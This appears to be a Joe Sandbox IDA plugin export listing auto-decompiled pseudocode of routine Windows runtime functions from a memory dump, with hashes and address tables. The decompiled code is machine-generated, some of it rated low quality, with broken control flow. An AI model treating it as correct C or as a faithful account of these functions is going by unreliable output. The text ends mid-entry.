                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3e5c8980996b5941de1836695cb8b718603580eff08ea1f850ef7e24c0f0dcd8
                                                                              • Instruction ID: 477c7d23543e887be0a8e6f4953edc9961f2f9b2993c6c7b2dbf368f8626edcd
                                                                              • Opcode Fuzzy Hash: 3e5c8980996b5941de1836695cb8b718603580eff08ea1f850ef7e24c0f0dcd8
                                                                              • Instruction Fuzzy Hash: CE013C74A0120DAFDB04EFA8D545AAEB7B4EF58300F50415AB905EB381EA34DA00CB94
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01821608 Relevance: .0, Instructions: 34COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 46%
                                                                              			E01821608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0x185d360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E01787D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E017AB640(E017A9AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}














                                                                              0x01821608
                                                                              0x01821617
                                                                              0x0182161d
                                                                              0x01821625
                                                                              0x01821628
                                                                              0x0182162b
                                                                              0x01821636
                                                                              0x01821648
                                                                              0x01821638
                                                                              0x01821641
                                                                              0x01821641
                                                                              0x01821653
                                                                              0x01821654
                                                                              0x01821656
                                                                              0x0182165b
                                                                              0x0182166e

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: df4ddc5917571c40643c257cfcf0df54efe4c022f26092b6a8ee56ffc6e5f766
                                                                              • Instruction ID: e75d47434240bfc8c1a2996700685f833e726180171e38ff2defa93a484bc4e9
                                                                              • Opcode Fuzzy Hash: df4ddc5917571c40643c257cfcf0df54efe4c022f26092b6a8ee56ffc6e5f766
                                                                              • Instruction Fuzzy Hash: 4CF06271A00258EFDB14EFA8D549AAEB7F4EF54300F544169E915EB381E6349A40CB54
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0178C577 Relevance: .0, Instructions: 33COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E0178C577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E0178C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x17411cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E018388F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}









                                                                              0x0178c577
                                                                              0x0178c57d
                                                                              0x0178c581
                                                                              0x0178c5b5
                                                                              0x0178c5b9
                                                                              0x0178c5ce
                                                                              0x0178c5ce
                                                                              0x0178c5ca
                                                                              0x00000000
                                                                              0x0178c5ca
                                                                              0x0178c5c4
                                                                              0x0178c5c8
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0178c5ad
                                                                              0x00000000
                                                                              0x0178c5af

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 512db8385d7ea73ad59f6fafb33eb94eaa5e4ab9efa8329374a48bca3275cbd3
                                                                              • Instruction ID: a3947a02815773dccfcf3146bb35681a31b5ca975bba3fa28040f8cc57972cf2
                                                                              • Opcode Fuzzy Hash: 512db8385d7ea73ad59f6fafb33eb94eaa5e4ab9efa8329374a48bca3275cbd3
                                                                              • Instruction Fuzzy Hash: 2DF090B29956909FEF37B71C8004BA1FFD49B05670F7484A6E51587502C7A4D880C271
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01822073 Relevance: .0, Instructions: 32COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 94%
                                                                              			E01822073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E0181FD22(__ecx);
				_t19 =  *0x185849c - _t3; // 0x0
				if(_t19 == 0) {
					__eflags = _t17 -  *0x1858748; // 0x0
					if(__eflags <= 0) {
						E01821C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x1858724 & 0x00000004;
							if(( *0x1858724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x1858724; // 0x0
					return E01818DF1(__ebx, 0xc0000374, 0x1855890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}







                                                                              0x01822076
                                                                              0x01822078
                                                                              0x0182207d
                                                                              0x01822083
                                                                              0x018220a4
                                                                              0x018220aa
                                                                              0x018220ac
                                                                              0x018220b7
                                                                              0x018220ba
                                                                              0x018220bc
                                                                              0x018220c9
                                                                              0x018220c9
                                                                              0x018220d0
                                                                              0x018220d2
                                                                              0x00000000
                                                                              0x018220d2
                                                                              0x018220be
                                                                              0x018220c3
                                                                              0x018220c5
                                                                              0x018220c7
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x018220c7
                                                                              0x018220bc
                                                                              0x018220d4
                                                                              0x01822085
                                                                              0x01822085
                                                                              0x018220a3
                                                                              0x018220a3

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 45d5b5a4361c9ed8f4d0339f67729335a2bd9b88295c6a2d45027d46a889e219
                                                                              • Instruction ID: 6f4887b7de0cf416d589a323c00a2829ad78a910d8f3a56b276c3578e06ed345
                                                                              • Opcode Fuzzy Hash: 45d5b5a4361c9ed8f4d0339f67729335a2bd9b88295c6a2d45027d46a889e219
                                                                              • Instruction Fuzzy Hash: 8AF0A02B8152A54ADF336B2D61013E23FD7D756310B590486D990DB209C53C8BD3CF61
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017A927A Relevance: .0, Instructions: 32COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 54%
                                                                              			E017A927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L01784620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E017AFA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E017A92C6(_t11, _t14);
				}
				return _t11;
			}





                                                                              0x017a9295
                                                                              0x017a9299
                                                                              0x017a929f
                                                                              0x017a92aa
                                                                              0x017a92ad
                                                                              0x017a92ae
                                                                              0x017a92af
                                                                              0x017a92b0
                                                                              0x017a92b4
                                                                              0x017a92bb
                                                                              0x017a92bb
                                                                              0x017a92c5

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                                              • Instruction ID: 41e900b0bb2c16728ab9112cd3e0880e171aaecf59faf37b6ea9c81bb9a51952
                                                                              • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                                              • Instruction Fuzzy Hash: 9EE02B323405016BE7119E09CC84F47B75DDFD2724F004078F6001E282C6E5DD1887A0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01838D34 Relevance: .0, Instructions: 32COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 43%
                                                                              			E01838D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x185d360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E01787D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E017AB640(E017A9AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}













                                                                              0x01838d34
                                                                              0x01838d43
                                                                              0x01838d4b
                                                                              0x01838d4e
                                                                              0x01838d52
                                                                              0x01838d5c
                                                                              0x01838d6e
                                                                              0x01838d5e
                                                                              0x01838d67
                                                                              0x01838d67
                                                                              0x01838d79
                                                                              0x01838d7a
                                                                              0x01838d7c
                                                                              0x01838d81
                                                                              0x01838d94

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 73bbbd17e2c2b04ed0d08810ac542754c35c1b01467677cb1cce41f45915dbc5
                                                                              • Instruction ID: 6db1d5300130196e71311826863f67a329b6992c950bc3dd642d66811ea7ec1e
                                                                              • Opcode Fuzzy Hash: 73bbbd17e2c2b04ed0d08810ac542754c35c1b01467677cb1cce41f45915dbc5
                                                                              • Instruction Fuzzy Hash: 07F0B470A0460C9FDB14EFB8D549A6EB7B4EF54300F908199F905EB281EA34DA00CB94
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01838B58 Relevance: .0, Instructions: 31COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 36%
                                                                              			E01838B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x185d360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E01787D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E017AB640(E017A9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                                                              0x01838b67
                                                                              0x01838b6f
                                                                              0x01838b72
                                                                              0x01838b7d
                                                                              0x01838b8f
                                                                              0x01838b7f
                                                                              0x01838b88
                                                                              0x01838b88
                                                                              0x01838b9a
                                                                              0x01838b9b
                                                                              0x01838b9d
                                                                              0x01838ba2
                                                                              0x01838bb5

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 422f32dd41c78c791005d4ab6d23efe772ae0cbbb5e2fdb798d31938095de853
                                                                              • Instruction ID: 18416e67fce50892da76b84d9fef87e4d379790dd4d31bf36847184a3f65652b
                                                                              • Opcode Fuzzy Hash: 422f32dd41c78c791005d4ab6d23efe772ae0cbbb5e2fdb798d31938095de853
                                                                              • Instruction Fuzzy Hash: 16F082B0A04259ABDB14EBA8D90AE6EB7B4EF44304F540599BA05DB381EA34DA00C794
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0178746D Relevance: .0, Instructions: 31COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 88%
                                                                              			E0178746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E0177EB70(__ecx, 0x18579a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E017A95D0();
							L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}









                                                                              0x0178746d
                                                                              0x0178746d
                                                                              0x0178746d
                                                                              0x01787471
                                                                              0x01787488
                                                                              0x017cf92d
                                                                              0x0178748e
                                                                              0x01787491
                                                                              0x01787495
                                                                              0x017cf937
                                                                              0x017cf93a
                                                                              0x017cf94e
                                                                              0x017cf953
                                                                              0x017cf956
                                                                              0x017cf956
                                                                              0x01787495
                                                                              0x00000000
                                                                              0x01787488
                                                                              0x01787473
                                                                              0x01787478
                                                                              0x0178747d
                                                                              0x01787481
                                                                              0x00000000
                                                                              0x01787481
                                                                              0x0178747d
                                                                              0x0178747a
                                                                              0x00000000

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4e6a4e389f01bed681410e9c0f0c95c3ea879701a5e6fe93dcb03c39eb99aa86
                                                                              • Instruction ID: a56f2af82e141030708b55019f8a16b3f06885f5c459dc8b0cc55ef631fe10c0
                                                                              • Opcode Fuzzy Hash: 4e6a4e389f01bed681410e9c0f0c95c3ea879701a5e6fe93dcb03c39eb99aa86
                                                                              • Instruction Fuzzy Hash: F5F0E934580149AADF0AB76CC840F79FFB1AF04794F644299D96BAF161E7649800C795
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01838CD6 Relevance: .0, Instructions: 31COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 36%
                                                                              			E01838CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x185d360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E01787D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E017AB640(E017A9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                                                              0x01838ce5
                                                                              0x01838ced
                                                                              0x01838cf0
                                                                              0x01838cfb
                                                                              0x01838d0d
                                                                              0x01838cfd
                                                                              0x01838d06
                                                                              0x01838d06
                                                                              0x01838d18
                                                                              0x01838d19
                                                                              0x01838d1b
                                                                              0x01838d20
                                                                              0x01838d33

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 098167679d938617538b17b7e5277d7b6f4bece71395e0d2da90ac92fa0b18b0
                                                                              • Instruction ID: e3452ce50db2ab849f2f4ac9fa36c73f933fedd9e62508677017e001bf9fcfdd
                                                                              • Opcode Fuzzy Hash: 098167679d938617538b17b7e5277d7b6f4bece71395e0d2da90ac92fa0b18b0
                                                                              • Instruction Fuzzy Hash: 84F08270A04209ABDB04EBB8D949EAEB7B4EF59304F540299F916EB285EA34DA00C754
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01764F2E Relevance: .0, Instructions: 31COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E01764F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E018388F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E0178C5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x1741030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}









                                                                              0x01764f2e
                                                                              0x01764f34
                                                                              0x01764f38
                                                                              0x017c0b85
                                                                              0x017c0b85
                                                                              0x017c0b89
                                                                              0x017c0b9a
                                                                              0x017c0b9a
                                                                              0x017c0b9f
                                                                              0x00000000
                                                                              0x017c0b9f
                                                                              0x017c0b94
                                                                              0x017c0b98
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017c0b98
                                                                              0x01764f3e
                                                                              0x01764f48
                                                                              0x00000000
                                                                              0x01764f6e
                                                                              0x00000000
                                                                              0x01764f70

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 178e5d262ec26cc32a5ec12877f0f2167e4fd57ef639fd15fdfcafe3ec619792
                                                                              • Instruction ID: 61dc62b64aae53a78afb677a9f63d87e15a95f293a12bb4670f09410f08704ad
                                                                              • Opcode Fuzzy Hash: 178e5d262ec26cc32a5ec12877f0f2167e4fd57ef639fd15fdfcafe3ec619792
                                                                              • Instruction Fuzzy Hash: 14F0BE3A526694CFD762DF1CCA44B22FBE8AB00B78F54467CF40587922C724E880C7D0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0179A44B Relevance: .0, Instructions: 29COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E0179A44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x1857b9c; // 0x0
				_t15 = __ecx;
				_t16 = L01784620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E017AFA60(_t17, 0, _t15 << 2);
				return _t17;
			}







                                                                              0x0179a44b
                                                                              0x0179a453
                                                                              0x0179a472
                                                                              0x0179a476
                                                                              0x00000000
                                                                              0x0179a493
                                                                              0x0179a47a
                                                                              0x0179a47f
                                                                              0x0179a486
                                                                              0x00000000

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3020d05315870295e8d8428d71002bd543da27f7d899a5e2f09d0b18f25b6e63
                                                                              • Instruction ID: 8f78ec7ec1422e16770d4ddbe082a3b467d3c09340e083141e7444404f2ad636
                                                                              • Opcode Fuzzy Hash: 3020d05315870295e8d8428d71002bd543da27f7d899a5e2f09d0b18f25b6e63
                                                                              • Instruction Fuzzy Hash: 1AE09272B42422ABD3215A18BC00F66B39DDBE5A51F0A4035E605C7224D668DE05C7E1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0176F358 Relevance: .0, Instructions: 28COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 79%
                                                                              			E0176F358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E0179F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L01784620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}






                                                                              0x0176f35d
                                                                              0x0176f361
                                                                              0x0176f367
                                                                              0x0176f372
                                                                              0x0176f38c
                                                                              0x0176f38c
                                                                              0x0176f394

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                                              • Instruction ID: 2aea87b9ac0cb1660797eaea542f49cff325b765dff7e2edc2af4a8adff43304
                                                                              • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                                              • Instruction Fuzzy Hash: 98E0D832A40218FBDB21A6D9AD05F5AFFACDB54A60F000155FE04D7150D5649D00D2D0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0177FF60 Relevance: .0, Instructions: 22COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E0177FF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x17411a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E018388F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E01780050(_t14);
				}
			}










                                                                              0x0177ff66
                                                                              0x0177ff6b
                                                                              0x00000000
                                                                              0x0177ff8f
                                                                              0x00000000
                                                                              0x0177ff8f

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 91a21ccbc554db5effe8bc93c3e8ceb4fcab978423e819b3e972829cbf1e772b
                                                                              • Instruction ID: 6eaa6a17d334e9e6abdbd2574823889bfe37e31d99d6abb9948dcc3ba28903ed
                                                                              • Opcode Fuzzy Hash: 91a21ccbc554db5effe8bc93c3e8ceb4fcab978423e819b3e972829cbf1e772b
                                                                              • Instruction Fuzzy Hash: 9FE0DFB0209204DFDF35EB59E240F35FB9C9B52721F19805DF018CB502CA21E881C286
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017F41E8 Relevance: .0, Instructions: 21COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 82%
                                                                              			E017F41E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x18408f0);
				_t5 = E017BD08C(__ebx, __edi, __esi);
				if( *0x18587ec == 0) {
					E0177EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x18587ec == 0) {
						 *0x18587f0 = 0x18587ec;
						 *0x18587ec = 0x18587ec;
						 *0x18587e8 = 0x18587e4;
						 *0x18587e4 = 0x18587e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L017F4248();
				}
				return E017BD0D1(_t5);
			}





                                                                              0x017f41e8
                                                                              0x017f41ea
                                                                              0x017f41ef
                                                                              0x017f41fb
                                                                              0x017f4206
                                                                              0x017f420b
                                                                              0x017f4216
                                                                              0x017f421d
                                                                              0x017f4222
                                                                              0x017f422c
                                                                              0x017f4231
                                                                              0x017f4231
                                                                              0x017f4236
                                                                              0x017f423d
                                                                              0x017f423d
                                                                              0x017f4247

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f63b409d03ed675c3b24da99887f1d8141b2a280073c542c97e50b6af18a7774
                                                                              • Instruction ID: 539c4576163071eb805ae1c35fdb6fa8cd7f74739dbb0d8591ad990a3933ba90
                                                                              • Opcode Fuzzy Hash: f63b409d03ed675c3b24da99887f1d8141b2a280073c542c97e50b6af18a7774
                                                                              • Instruction Fuzzy Hash: 00F03278824705CFDBB0EFBAD508759B6B4F756324F00416B92018739DCB7846A4CF01
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0181D380 Relevance: .0, Instructions: 21COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E0181D380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L0176E8B0(__ecx, _a4, 0xfff);
					L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}




                                                                              0x0181d38a
                                                                              0x0181d39b
                                                                              0x0181d3b1
                                                                              0x00000000
                                                                              0x0181d3b6
                                                                              0x00000000

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
